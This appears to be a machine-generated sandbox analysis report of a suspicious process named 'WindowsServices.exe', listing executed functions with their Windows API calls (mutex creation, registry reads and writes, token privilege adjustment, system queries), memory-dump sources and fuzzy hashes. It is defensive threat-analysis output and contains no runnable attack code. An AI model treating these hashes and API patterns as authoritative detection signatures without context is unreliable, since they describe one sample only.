Opcode Fuzzy Hash: b63a637a9fbfae831aa2d74e583afcaa24bd98739bd23e32beb9f810a025decb
Instruction Fuzzy Hash: C8515D70A01219CFDB24EF74D851BECB7B1AF85304F5084AAD409AB391DB35AE89DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00CBAB92 Relevance: 1.6, APIs: 1, Instructions: 89
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 00CBAC39

Memory Dump Source

Source File: 0000000C.00000002.1802106426.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_cba000_WindowsServices.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 8aa49a11cf9da9daa51d74a7b0c73a3f9209d98a37de7b2a150642b6edb1f4df
Instruction ID: a3946c18193b3d15003bd5166b37264d267aeef6034add75a98f683945781862
Opcode Fuzzy Hash: 8aa49a11cf9da9daa51d74a7b0c73a3f9209d98a37de7b2a150642b6edb1f4df
Instruction Fuzzy Hash: 87319171509380AFE711CF65DD45B96BFF8EF06314F08849AE984CB292D375E909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CBA361 Relevance: 1.6, APIs: 1, Instructions: 85
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,8A7A8376,00000000,00000000,00000000,00000000), ref: 00CBA40C

Memory Dump Source

Source File: 0000000C.00000002.1802106426.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_cba000_WindowsServices.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 76314a986f013e1a0fbea793d869bc09d76e459a630ec1dbf42b44fbcdf52ba8
Instruction ID: 54551f7d1ba13775a805a62ce5f72722f0fb5c6595ebc5e5d7825393be560b31
Opcode Fuzzy Hash: 76314a986f013e1a0fbea793d869bc09d76e459a630ec1dbf42b44fbcdf52ba8
Instruction Fuzzy Hash: 3B317375505780AFE722CF11CC84F92BBF8EF06710F08849AE985DB292D364E949CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00CBA462 Relevance: 1.6, APIs: 1, Instructions: 77
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegSetValueExW.KERNELBASE(?,00000E24,8A7A8376,00000000,00000000,00000000,00000000), ref: 00CBA4F8

Memory Dump Source

Source File: 0000000C.00000002.1802106426.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_cba000_WindowsServices.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 6373a60fae5a26419d7ee967dc8dfd401891f25b8e29e1a9a2cd2d6dab475a15
Instruction ID: 9062487d06fcb4a0b9fe88e43ff5c6c26bf22981d683e00420b3060139249599
Opcode Fuzzy Hash: 6373a60fae5a26419d7ee967dc8dfd401891f25b8e29e1a9a2cd2d6dab475a15
Instruction Fuzzy Hash: F2216076504780AFD7228F11DC44FA7BFBCEF46610F08849AE985DB652D264E948CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00CBABC6 Relevance: 1.6, APIs: 1, Instructions: 72
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 00CBAC39

Memory Dump Source

Source File: 0000000C.00000002.1802106426.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_cba000_WindowsServices.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 4cfe62fe4c27a26cec0822722edf851cb1cb4a7e08de5af685c71cfebf41068d
Instruction ID: 4e848ecbf5f8df2899b58bad666065b2ee4a9319073606e8adc1f77c450cd30a
Opcode Fuzzy Hash: 4cfe62fe4c27a26cec0822722edf851cb1cb4a7e08de5af685c71cfebf41068d
Instruction Fuzzy Hash: 0A2192716002409FE710DF66DD45BA6FBE8EF05324F14C469E9889B741D375E908CA76

Uniqueness

Uniqueness Score: -1.00%

Function 00CBA67B Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00CBA6F6

Memory Dump Source

Source File: 0000000C.00000002.1802106426.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_cba000_WindowsServices.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 99a7f92bc1f7b3f272638f99ca51a04504810ea6ba70d14be37977cb458204a0
Instruction ID: 2a8c2ddc7b6a67b045e8e8c1cec9026ca49cea19884c44c221988cfce2d44fbf
Opcode Fuzzy Hash: 99a7f92bc1f7b3f272638f99ca51a04504810ea6ba70d14be37977cb458204a0
Instruction Fuzzy Hash: E421B3B15083805FD7118B25DC45B92BFF8AF06310F0984DAE884CB263D224D909C762

Uniqueness

Uniqueness Score: -1.00%

Function 00CBA392 Relevance: 1.6, APIs: 1, Instructions: 69
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,8A7A8376,00000000,00000000,00000000,00000000), ref: 00CBA40C

Memory Dump Source

Source File: 0000000C.00000002.1802106426.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_cba000_WindowsServices.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: bf35c9536fc14503b35b9353142ce7dc463289c512ac7ab11855df6c4bd8881b
Instruction ID: 6f489dc8c7f4b4c760cc4775365d4aa59ab934d695234ecbcb4cea6195222cb8
Opcode Fuzzy Hash: bf35c9536fc14503b35b9353142ce7dc463289c512ac7ab11855df6c4bd8881b
Instruction Fuzzy Hash: 95219076600604AFE720CF16DC84FA6F7ECEF04720F18C46AE9859B651D7A4E949CA72

Uniqueness

Uniqueness Score: -1.00%

Function 00CBA960 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00CBA9CC

Memory Dump Source

Source File: 0000000C.00000002.1802106426.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_cba000_WindowsServices.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 044ace6d355d965ba105d4e5bfa1a5e7b26761afb1a1a2736f41c6ba4dd33b8d
Instruction ID: 4fd87cdd3f32e0bb64b203e03ae484ff8d0fdc5f338bd4485b2864203b69ee90
Opcode Fuzzy Hash: 044ace6d355d965ba105d4e5bfa1a5e7b26761afb1a1a2736f41c6ba4dd33b8d
Instruction Fuzzy Hash: 2921AE725093C05FDB128B25DC54A92BFB8AF47324F0984DAE8858F663D264A908DB72

Uniqueness

Uniqueness Score: -1.00%

Function 00CBA486 Relevance: 1.6, APIs: 1, Instructions: 65
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegSetValueExW.KERNELBASE(?,00000E24,8A7A8376,00000000,00000000,00000000,00000000), ref: 00CBA4F8

Memory Dump Source

Source File: 0000000C.00000002.1802106426.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_cba000_WindowsServices.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: c85e63d53a34ed7f34da7e275d39b0958942446d412edbfc6262ed8f66432034
Instruction ID: 942e2b57179a8d25b15070d08c0d55c3bc210042923df6bd8beeda96b9dbbb08
Opcode Fuzzy Hash: c85e63d53a34ed7f34da7e275d39b0958942446d412edbfc6262ed8f66432034
Instruction Fuzzy Hash: 71118E76500600AFEB318F12DC45FA6FBECEF14724F18C45AED859A651D364E948CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 00CBA6AE Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00CBA6F6

Memory Dump Source

Source File: 0000000C.00000002.1802106426.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_cba000_WindowsServices.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: d742d12e1f9d8715e869507f4b6d9d7b9adc81e9631c7951806c692fefdc3d26
Instruction ID: 01e1d867537aa58d0a9e4f03124e92daf4836415a9fab4b9e43f8eb2c03af9d4
Opcode Fuzzy Hash: d742d12e1f9d8715e869507f4b6d9d7b9adc81e9631c7951806c692fefdc3d26
Instruction Fuzzy Hash: 1011CC71A042009FDB50CF15D845796FBE8EF14320F18C4AAED45DB745D774E944CA72

Uniqueness

Uniqueness Score: -1.00%

Function 00CBA99A Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00CBA9CC

Memory Dump Source

Source File: 0000000C.00000002.1802106426.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_cba000_WindowsServices.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 15ea63eb1f1b3566ede2479cca805a6f1299eb600cafceb3934a7be74cbff8e5
Instruction ID: e1474296c41a4a117f299d4a620c64e7e1d2ee81e15fe6f4dcfd5ff4362228c0
Opcode Fuzzy Hash: 15ea63eb1f1b3566ede2479cca805a6f1299eb600cafceb3934a7be74cbff8e5
Instruction Fuzzy Hash: 0401D4719006408FDB60CF16D984796FBE8DF15320F18C0AADD499B646D274E508DE72

Uniqueness

Uniqueness Score: -1.00%

Function 04E70080 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1806965906.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4e70000_WindowsServices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3e6be0fd81d6a8bd70363b5fc564cb225d4d3ea710b85209f62f8572589cd87
Instruction ID: e26770282fd9e7c92d976a137360733aed4e95156ec8aab7c11c7742562f7181
Opcode Fuzzy Hash: d3e6be0fd81d6a8bd70363b5fc564cb225d4d3ea710b85209f62f8572589cd87
Instruction Fuzzy Hash: 3F4135701156428FC704FF39E985689B7B2FFA5248745C829D804DB26EEB34AD4ECB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F10649 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1803218210.0000000000F10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_f10000_WindowsServices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c0525a0d7ee9a88ce153616afd6b8cfb82e3e2b053009e81b1f48a70461e5d8
Instruction ID: 3abd65974994402767fc66f82fd9e10c004ca513d84fba071af4226601c8277d
Opcode Fuzzy Hash: 8c0525a0d7ee9a88ce153616afd6b8cfb82e3e2b053009e81b1f48a70461e5d8
Instruction Fuzzy Hash: F811DB7540D7C05FC3138B21AC55852BFB8EF4722070984DFE849CB653D229A848CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 04E70006 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1806965906.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4e70000_WindowsServices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50c6c7e7841c6602398aa1b0e58368c26dccd40a493aa3931866b1327affea72
Instruction ID: 59b45409c991872109e2a5e07a7d8051f2d856fe5f3b3cd40217c83de6c4fce9
Opcode Fuzzy Hash: 50c6c7e7841c6602398aa1b0e58368c26dccd40a493aa3931866b1327affea72
Instruction Fuzzy Hash: 2501059698F7C2AFD31342745CA51943FB0ADA312474E01D7C881CB0A3E20D5A5FD762

Uniqueness

Uniqueness Score: -1.00%

Function 04E70C10 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1806965906.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4e70000_WindowsServices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17f4bb1b66cde38bc0ef70980d5f93413d7299bd6d700056cadb8e114439d382
Instruction ID: faac6cd4866c25435bdfe4c14680b282b26f6bf11f137f84dd5b59cb1a542eda
Opcode Fuzzy Hash: 17f4bb1b66cde38bc0ef70980d5f93413d7299bd6d700056cadb8e114439d382
Instruction Fuzzy Hash: 13014231A093800FC3127378A8154AD3B629FA22357094AAFD4509B3E7CE789C8AC756

Uniqueness

Uniqueness Score: -1.00%

Function 04E70C1B Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1806965906.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4e70000_WindowsServices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe6f2bba48cf44221e0a4a0428a94669ccf813d07997aa1c63b628ebfabd91f7
Instruction ID: 1c70b21ae0263db26d22adb0419cd09554d7b60ab80ffc1e5e6125e2c529ccba
Opcode Fuzzy Hash: fe6f2bba48cf44221e0a4a0428a94669ccf813d07997aa1c63b628ebfabd91f7
Instruction Fuzzy Hash: 2F012131B093804FC3117338A8554AE3B629BA222170949AEE8419B3E7DF799C4AC792

Uniqueness

Uniqueness Score: -1.00%

Function 00F105E0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1803218210.0000000000F10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_f10000_WindowsServices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2b2f5ffebb89a41c34e589da543a446bcfe1097d339f087fda05cf076b7bf0e
Instruction ID: d11512c1dcb91d27a300f459e6b5aacbf940cd570b5c0fb37b00025863aa82f4
Opcode Fuzzy Hash: f2b2f5ffebb89a41c34e589da543a446bcfe1097d339f087fda05cf076b7bf0e
Instruction Fuzzy Hash: AD01F9765097806FD712CF16AC44863FFB8EF86630709C49FEC498B612D225B808CB72

Uniqueness

Uniqueness Score: -1.00%

Function 04E70C3B Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1806965906.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4e70000_WindowsServices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f259fa1a59fb689f3506c4d56f8529858ac6eb0fa24d5d245e871dd72d65e31
Instruction ID: 77cb2c2d39e7558da038ad9d33859efebe60e88aa97ca19099121bd69c655318
Opcode Fuzzy Hash: 3f259fa1a59fb689f3506c4d56f8529858ac6eb0fa24d5d245e871dd72d65e31
Instruction Fuzzy Hash: AFF0F0347002108FC314773DA8565AE3362DBE5356B14087EE8419B396CF79DC4BC391

Uniqueness

Uniqueness Score: -1.00%

Function 00F10606 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1803218210.0000000000F10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_f10000_WindowsServices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6587b4044f2af9d1e4334320a15b7e55eb49b21b7f2fb063e102ce8643e25a8c
Instruction ID: d2228cc89022176bb6f9efe5b24503d912fbd1ba30ba8c192f51c96c07927437
Opcode Fuzzy Hash: 6587b4044f2af9d1e4334320a15b7e55eb49b21b7f2fb063e102ce8643e25a8c
Instruction Fuzzy Hash: 06E06DB6A006049B9750CF0AEC41452F7D8EB88630708C07FDC0D8B701E635B508CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 00CB23F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1802074352.0000000000CB2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_cb2000_WindowsServices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7961455cf75c016809b687a0a84c7d05ba427efe9d69cd5a1a2069a0b1d5758
Instruction ID: 061b08c19ae437026ce65fc65f7e8ebebcacd3533b392c062bd71363dd49a13c
Opcode Fuzzy Hash: d7961455cf75c016809b687a0a84c7d05ba427efe9d69cd5a1a2069a0b1d5758
Instruction Fuzzy Hash: 95D02E392406C04FD3168E0CC2A8BC53BD4BF40708F0A00F9A8008BB63C728DAC8EA00

Uniqueness

Uniqueness Score: -1.00%

Function 00CB23BC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1802074352.0000000000CB2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_cb2000_WindowsServices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac7900c5df6793865d0913e09bd10e64da706d5dc6a73317c801a345f16e82d8
Instruction ID: 30a1f106a7d01a75664f25c1f386e5119d8be0e4d58c92c03940eb1e4c18ec2d
Opcode Fuzzy Hash: ac7900c5df6793865d0913e09bd10e64da706d5dc6a73317c801a345f16e82d8
Instruction Fuzzy Hash: 08D05E343406814BC715DE0CD2D4F9937D8AB44B15F0644E8AC208B772C7A8DAC4CA00

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: WindowsServices.exePID: 6400, Parent PID: 1868COMMON

Execution Graph

Execution Coverage:	13.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	35
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00C2A893 Relevance: 1.6, APIs: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00C2A913

Memory Dump Source

Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 7da2c0a9b4dfeb1b1ec16baac15c3ea656b7e0c427b2c453182f40de6a1b8052
Instruction ID: cce8c26220d91f8208e5ec4673d0700251d03a723ea0724a3c89a68db338209a
Opcode Fuzzy Hash: 7da2c0a9b4dfeb1b1ec16baac15c3ea656b7e0c427b2c453182f40de6a1b8052
Instruction Fuzzy Hash: 5521A1765097809FEB228F25DC44B52BFF4EF16310F0984DAE9858B5A3D275E908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00C2AA15 Relevance: 1.6, APIs: 1, Instructions: 57
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQuerySystemInformation.NTDLL ref: 00C2AA81

Memory Dump Source

Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: c9bfd49a5fcc40b8dff932d4ab01d770697e9dff070f6c862840dfa4d8384df9
Instruction ID: bb7b2085c473d50b1c1e486acc8ac24f19e96ab8c9f5ddb7a13226f82f502123
Opcode Fuzzy Hash: c9bfd49a5fcc40b8dff932d4ab01d770697e9dff070f6c862840dfa4d8384df9
Instruction Fuzzy Hash: 6F1190714097C09FDB228F24DC45B52FFF4EF56314F0984DAE9844B663D275A908DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00C2A8CA Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00C2A913

Memory Dump Source

Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: e093ede0026c17babd0a1155cb6ade8e78cf591f76172f0a88b145656711e710
Instruction ID: 187c149a6c640469b12028b97034d868b92316d5a466d8350094ed9659b2391a
Opcode Fuzzy Hash: e093ede0026c17babd0a1155cb6ade8e78cf591f76172f0a88b145656711e710
Instruction Fuzzy Hash: D611C2725007009FEB20CF16E884B62FBE4EF18320F08C4AAED458BA56D375E558DF62

Uniqueness

Uniqueness Score: -1.00%

Function 00C2AA46 Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 00C2AA81

Memory Dump Source

Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: fa37736a873c97aedd5a168deedca6dccd90e23c6bc4e2006fcc2569c2e56a76
Instruction ID: 417c5b41bd664b20e199b46261969878f5bf147a83d624bf783f0256eb79d556
Opcode Fuzzy Hash: fa37736a873c97aedd5a168deedca6dccd90e23c6bc4e2006fcc2569c2e56a76
Instruction Fuzzy Hash: FE018F36400640DFDB208F15E984B62FBE0EF19320F08C09AED450BA52D375E418DF62

Uniqueness

Uniqueness Score: -1.00%

Function 00E90278 Relevance: 2.7, Strings: 2, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

2l, xrefs: 00E90548
2l, xrefs: 00E905D8

Memory Dump Source

Source File: 00000015.00000002.1997560679.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_e90000_WindowsServices.jbxd

Similarity

API ID:
String ID: 2l$2l
API String ID: 0-1392491997
Opcode ID: 11e554bac97f782c342041841b620177e46cd7c14e57adf671e7dfd488da13c4
Instruction ID: 93a806bf2a8dc6168ced774a86b8d5ca88aa7ffa519071c0e871256f37dd5638
Opcode Fuzzy Hash: 11e554bac97f782c342041841b620177e46cd7c14e57adf671e7dfd488da13c4
Instruction Fuzzy Hash: CFA18D70A01218CFDB14EFB5D854BEDBBB2AF85304F5084A9D409AB3A1DB359E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00E90392 Relevance: 2.7, Strings: 2, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

2l, xrefs: 00E90548
2l, xrefs: 00E905D8

Memory Dump Source

Source File: 00000015.00000002.1997560679.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_e90000_WindowsServices.jbxd

Similarity

API ID:
String ID: 2l$2l
API String ID: 0-1392491997
Opcode ID: 735a3b7511139497743b54232627a8c2783ce456b6841445448de93d5b75574a
Instruction ID: d324c2d3f03cd50f9b2905f29d5e6e6a1babe6379b0ea6d3216a337c4be51635
Opcode Fuzzy Hash: 735a3b7511139497743b54232627a8c2783ce456b6841445448de93d5b75574a
Instruction Fuzzy Hash: 36617E70A01219CFDB24EFB5D950BECB7B2AF44308F5084A9D009AB3A1DB359E85DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00E90429 Relevance: 2.6, Strings: 2, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

2l, xrefs: 00E90548
2l, xrefs: 00E905D8

Memory Dump Source

Source File: 00000015.00000002.1997560679.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_e90000_WindowsServices.jbxd

Similarity

API ID:
String ID: 2l$2l
API String ID: 0-1392491997
Opcode ID: 163673cacf3390833a0a72c8854b58f556b056a2053af233f5d306be4de4a092
Instruction ID: 8d57b491d80817e2ffb9a62a556baab21f93bf3368227545462b7f4cb3d3c925
Opcode Fuzzy Hash: 163673cacf3390833a0a72c8854b58f556b056a2053af233f5d306be4de4a092
Instruction Fuzzy Hash: CC514970A01219CFDB24EFB5C850BECB7B1AF84304F5084A9D009AB7A1DB359E89DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00C2AB92 Relevance: 1.6, APIs: 1, Instructions: 89
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 00C2AC39

Memory Dump Source

Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: dd28d949abca705bd295d82beadaf349c3900cabcdc9d5f95abaaa653e3f4440
Instruction ID: f97158897a47e5ee0a1d9350393abdbedb4112e1e4d0d0471d33647b77464ccf
Opcode Fuzzy Hash: dd28d949abca705bd295d82beadaf349c3900cabcdc9d5f95abaaa653e3f4440
Instruction Fuzzy Hash: 5D31AF71509380AFE712CB65DC84B96BFF8EF06310F08849AE984CB692D375E909C762

Uniqueness

Uniqueness Score: -1.00%

Function 00C2A361 Relevance: 1.6, APIs: 1, Instructions: 85
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,E3D593FF,00000000,00000000,00000000,00000000), ref: 00C2A40C

Memory Dump Source

Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 9aeb1de80991acf821edbecfc2d9113ac9000218d09308ce9b904540ab719c9e
Instruction ID: dca4b21398ee3fc12a1555a2c32bfb6d16206c797ad54212085bd123b5017c39
Opcode Fuzzy Hash: 9aeb1de80991acf821edbecfc2d9113ac9000218d09308ce9b904540ab719c9e
Instruction Fuzzy Hash: AB316F75505780AFE722CF11DC84F92FBF8EF06710F08849AE9458B6A2D364E949CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00C2A462 Relevance: 1.6, APIs: 1, Instructions: 77
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegSetValueExW.KERNELBASE(?,00000E24,E3D593FF,00000000,00000000,00000000,00000000), ref: 00C2A4F8

Memory Dump Source

Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 449981446c7db377339eda64ccf2b5a66c4db9b1745590cff59011062dd00b9a
Instruction ID: 7ec96c056ccb2412c6ce73c99d0a1456fbc6b50f9ed16c5e14fd72c847c8edc6
Opcode Fuzzy Hash: 449981446c7db377339eda64ccf2b5a66c4db9b1745590cff59011062dd00b9a
Instruction Fuzzy Hash: 41217476504780AFD7228F11DC44FA7FFB8EF46710F08849AE945DB652D264E948C772

Uniqueness

Uniqueness Score: -1.00%

Function 00C2ABC6 Relevance: 1.6, APIs: 1, Instructions: 72
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 00C2AC39

Memory Dump Source

Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false

Joe Sandbox IDA Plugin

